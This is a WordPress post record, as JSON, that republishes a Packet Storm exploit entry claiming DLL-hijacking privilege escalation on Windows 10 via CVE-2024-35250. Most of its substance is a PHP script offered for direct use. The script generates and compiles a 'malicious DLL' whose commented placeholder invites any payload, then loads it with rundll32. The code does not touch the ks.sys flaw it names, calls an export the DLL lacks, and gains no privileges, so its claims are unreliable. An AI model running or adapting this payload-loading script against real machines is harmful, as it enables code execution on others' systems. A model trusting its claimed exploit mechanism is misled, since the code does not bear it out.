{"id":28302,"date":"2025-12-02T15:33:15","date_gmt":"2025-12-02T15:33:15","guid":{"rendered":"http:\/\/localhost\/?p=28302"},"modified":"2025-12-02T15:33:15","modified_gmt":"2025-12-02T15:33:15","slug":"microsoft-windows-10-famille-100190455487-dll-hijacking","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28302","title":{"rendered":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317"},"content":{"rendered":"

{“lastseen”:”2025-12-02T19:41:48″,”description”:”Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking”,”source”:””,”references”:””,”id”:”PACKETSTORM:212317″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-35250″],”sourceData”:”=============================================================================================================================================\\n | # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (DLL Hijacking) Privilege Escalation |\\n | # Author : indoushka |\\n | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 136.0.0 (64 bits) |\\n | # Vendor : https:\/\/www.Microsoft.com |\\n =============================================================================================================================================\\n \\n POC :\\n \\n [+] Dorking \u0130n Google Or Other Search Enggine.\\n \\n [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. \\n \\n There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.\\n \\n [+] What’s new in this version?\\n \\n Added DLL Hijacking exploit inside the code\\n \\t\\n Create a malicious DLL library directly from inside the code\\n \\n Use rundll32.exe to automatically load the payload\\n \\n Ensure all possible environments are supported (Windows 10 and 11)\\n \\n Improved compatibility with different languages\\n \\n (Related : https:\/\/packetstorm.news\/files\/id\/182984\/ Related CVE numbers: \\tCVE-2024-35250) .\\n \\n \\n [+] Usage : php poc.php\\n \\n [+] PayLoad :\\n \\n \\u003c?php\\n \/**\\n * \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2024-35250 \u0641\u064a Windows \u0645\u0639 \u062f\u0639\u0645 \u062c\u0645\u064a\u0639 \u0627\u0644\u0644\u063a\u0627\u062a + DLL Hijacking\\n *\/\\n \\n function getWindowsLCID() {\\n $output = shell_exec(‘wmic os get locale \/value’);\\n preg_match(‘\/Locale=(\\\\w+)\/’, $output, $matches);\\n return isset($matches[1]) ? hexdec($matches[1]) : 1033; \/\/ \\n }\\n \\n function localeToLanguage($locale) {\\n $languages = [\\n 1033 =\\u003e [‘English’, ‘C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\’], \/\/ en-US\\n 1036 =\\u003e [‘French’, ‘C:\\\\\\\\Utilisateurs\\\\\\\\Public\\\\\\\\’], \/\/ fr-FR\\n 3082 =\\u003e [‘Spanish’, ‘C:\\\\\\\\Usuarios\\\\\\\\Public\\\\\\\\’], \/\/ es-ES\\n 1046 =\\u003e [‘Portuguese’, ‘C:\\\\\\\\Usu\u00e1rios\\\\\\\\Public\\\\\\\\’], \/\/ pt-BR\\n 1031 =\\u003e [‘German’, ‘C:\\\\\\\\Benutzer\\\\\\\\\u00d6ffentlich\\\\\\\\’], \/\/ de-DE\\n 1049 =\\u003e [‘Russian’, ‘C:\\\\\\\\\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438\\\\\\\\\u041e\u0431\u0449\u0438\u0435\\\\\\\\’], \/\/ ru-RU\\n 1056 =\\u003e [‘Persian’, ‘C:\\\\\\\\\u06a9\u0627\u0631\u0628\u0631\u0627\u0646\\\\\\\\\u0639\u0645\u0648\u0645\u06cc\\\\\\\\’], \/\/ fa-IR\\n 1025 =\\u003e [‘Arabic’, ‘C:\\\\\\\\\u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0648\u0646\\\\\\\\\u0639\u0627\u0645\\\\\\\\’], \/\/ ar-SA\\n 1101 =\\u003e [‘Hindi’, ‘C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\’], \/\/ hi-IN\\n 1114 =\\u003e [‘Aramaic’, ‘C:\\\\\\\\\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd\\\\\\\\\u05e6\u05d9\u05d1\u05d5\u05e8\u05d9\\\\\\\\’], \/\/ \u0627\u0644\u0622\u0631\u0627\u0645\u064a\u0629\\n 1037 =\\u003e [‘Hebrew’, ‘C:\\\\\\\\\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd\\\\\\\\\u05e6\u05d9\u05d1\u05d5\u05e8\u05d9\\\\\\\\’], \/\/ he-IL\\n 2052 =\\u003e [‘Chinese (Simplified)’, ‘C:\\\\\\\\\u7528\u6237\\\\\\\\\u516c\u5171\\\\\\\\’], \/\/ zh-CN\\n 1028 =\\u003e [‘Chinese (Traditional)’, ‘C:\\\\\\\\\u4f7f\u7528\u8005\\\\\\\\\u516c\u7528\\\\\\\\’], \/\/ zh-TW\\n 1041 =\\u003e [‘Japanese’, ‘C:\\\\\\\\\u30e6\u30fc\u30b6\u30fc\\\\\\\\\u30d1\u30d6\u30ea\u30c3\u30af\\\\\\\\’], \/\/ ja-JP\\n 1042 =\\u003e [‘Korean’, ‘C:\\\\\\\\\uc0ac\uc6a9\uc790\\\\\\\\\uacf5\uc6a9\\\\\\\\’], \/\/ ko-KR\\n 1054 =\\u003e [‘Thai’, ‘C:\\\\\\\\\u0e1c\u0e39\u0e49\u0e43\u0e0a\u0e49\\\\\\\\\u0e2a\u0e32\u0e18\u0e32\u0e23\u0e13\u0e30\\\\\\\\’], \/\/ th-TH\\n 1066 =\\u003e [‘Vietnamese’, ‘C:\\\\\\\\Ng\u01b0\u1eddi d\u00f9ng\\\\\\\\C\u00f4ng c\u1ed9ng\\\\\\\\’], \/\/ vi-VN\\n ];\\n \\n return $languages[$locale] ?? [‘Unknown’, ‘C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\’]; \/\/ \\n }\\n \\n function getPublicPath() {\\n $locale = getWindowsLCID();\\n list($lang, $path) = localeToLanguage($locale);\\n echo \\”[+] \u0644\u063a\u0629 \u0627\u0644\u0646\u0638\u0627\u0645: $lang (LCID: $locale)\\\\n\\”;\\n return $path;\\n }\\n \\n function is64BitWindows() {\\n return (PHP_INT_SIZE === 8);\\n }\\n \\n function checkVulnerableDriver() {\\n $winDir = getenv(‘WINDIR’);\\n $driverPath = $winDir . ‘\\\\\\\\system32\\\\\\\\drivers\\\\\\\\ks.sys’;\\n \\n if (!file_exists($driverPath)) {\\n die(\\”[X] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 ks.sys\u060c \u0627\u0644\u0646\u0638\u0627\u0645 \u063a\u064a\u0631 \u0642\u0627\u0628\u0644 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\\\\n\\”);\\n }\\n \\n echo \\”[+] ks.sys \u0645\u0648\u062c\u0648\u062f \u0641\u064a \u0627\u0644\u0645\u0633\u0627\u0631: $driverPath\\\\n\\”;\\n return true;\\n }\\n \\n function getWindowsBuildNumber() {\\n $output = shell_exec(‘wmic os get BuildNumber \/value’);\\n preg_match(‘\/BuildNumber=(\\\\d+)\/’, $output, $matches);\\n return $matches[1] ?? null;\\n }\\n \\n function isVulnerableVersion($buildNumber) {\\n $vulnerableBuilds = range(14393, 19045); \/\/ \u0645\u0646 Windows 10 1607 \u0625\u0644\u0649 Windows 10 22H2\\n return in_array($buildNumber, $vulnerableBuilds);\\n }\\n \\n function createMaliciousDLL($dllPath) {\\n $dllCode = \\u003c\\u003c\\u003cEOD\\n #include \\u003cwindows.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n \\n BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {\\n if (ul_reason_for_call == DLL_PROCESS_ATTACH) {\\n system(\\”cmd.exe \/c calc.exe\\”); \/\/ \u0627\u0633\u062a\u0628\u062f\u0644 calc.exe \u0628\u0623\u064a \u062d\u0645\u0648\u0644\u0629 \u062a\u0631\u064a\u062f \u062a\u0646\u0641\u064a\u0630\u0647\u0627\\n }\\n return TRUE;\\n }\\n EOD;\\n \\n file_put_contents(\\”payload.c\\”, $dllCode);\\n shell_exec(\\”gcc -shared -o $dllPath payload.c -mwindows\\”);\\n }\\n \\n function exploit() {\\n if (!is64BitWindows()) {\\n die(\\”[X] \u0627\u0644\u0646\u0638\u0627\u0645 \u0644\u064a\u0633 64 \u0628\u062a\u060c \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u063a\u064a\u0631 \u0645\u0645\u0643\u0646.\\\\n\\”);\\n }\\n \\n if (!checkVulnerableDriver()) {\\n die(\\”[X] \u0644\u0627 \u064a\u0645\u0643\u0646 \u0645\u062a\u0627\u0628\u0639\u0629 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644.\\\\n\\”);\\n }\\n \\n $buildNumber = getWindowsBuildNumber();\\n if (!$buildNumber || !isVulnerableVersion($buildNumber)) {\\n die(\\”[X] \u0625\u0635\u062f\u0627\u0631 Windows \u063a\u064a\u0631 \u0645\u062f\u0639\u0648\u0645: $buildNumber\\\\n\\”);\\n }\\n \\n echo \\”[+] \u062a\u0645 \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0629\u060c \u0633\u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0622\u0646…\\\\n\\”;\\n \\n $publicPath = getPublicPath();\\n $payloadPath = $publicPath . \\”exploit_payload.dll\\”;\\n \\n echo \\”[+] \u0633\u064a\u062a\u0645 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0645\u0633\u0627\u0631: $payloadPath\\\\n\\”;\\n \\n createMaliciousDLL($payloadPath);\\n \\n echo \\”[+] \u062a\u0645 \u0625\u0646\u0634\u0627\u0621 DLL \u0627\u0644\u0636\u0627\u0631\u0629 \u0628\u0646\u062c\u0627\u062d…\\\\n\\”;\\n \\n $notepad = shell_exec(‘start \/B notepad.exe’); \/\/ \u062a\u0634\u063a\u064a\u0644 notepad \u0644\u0627\u0633\u062a\u0636\u0627\u0641\u0629 \u0627\u0644\u0640 DLL\\n sleep(1);\\n \\n echo \\”[+] \u062a\u0645 \u062a\u0634\u063a\u064a\u0644 Notepad\u060c \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062d\u0645\u0648\u0644\u0629…\\\\n\\”;\\n shell_exec(\\”rundll32 $payloadPath,Inject\\”); \/\/ \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0639\u0628\u0631 rundll32\\n }\\n \\n exploit();\\n ?\\u003e\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212317″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212317\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-02T19:41:48″,”description”:”Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking”,”source”:””,”references”:””,”id”:”PACKETSTORM:212317″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-35250″],”sourceData”:”=============================================================================================================================================\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28302","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28302\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-02T19:41:48″,”description”:”Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking”,”source”:””,”references”:””,”id”:”PACKETSTORM:212317″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-35250″],”sourceData”:”=============================================================================================================================================n | #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28302\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317\",\"datePublished\":\"2025-12-02T15:33:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\"},\"wordCount\":1209,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\",\"name\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28302\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28302#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28302","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem","og_description":"{“lastseen”:”2025-12-02T19:41:48″,”description”:”Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a DLL hijacking vulnerability that enables privilege escalation…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking”,”source”:””,”references”:””,”id”:”PACKETSTORM:212317″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-35250″],”sourceData”:”=============================================================================================================================================n | #...","og_url":"https:\/\/zero.redgem.net\/?p=28302","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28302#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28302"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317","datePublished":"2025-12-02T15:33:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28302"},"wordCount":1209,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28302#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28302","url":"https:\/\/zero.redgem.net\/?p=28302","name":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28302#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28302"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28302#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 DLL Hijacking_PACKETSTORM:212317"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28302"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28302\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}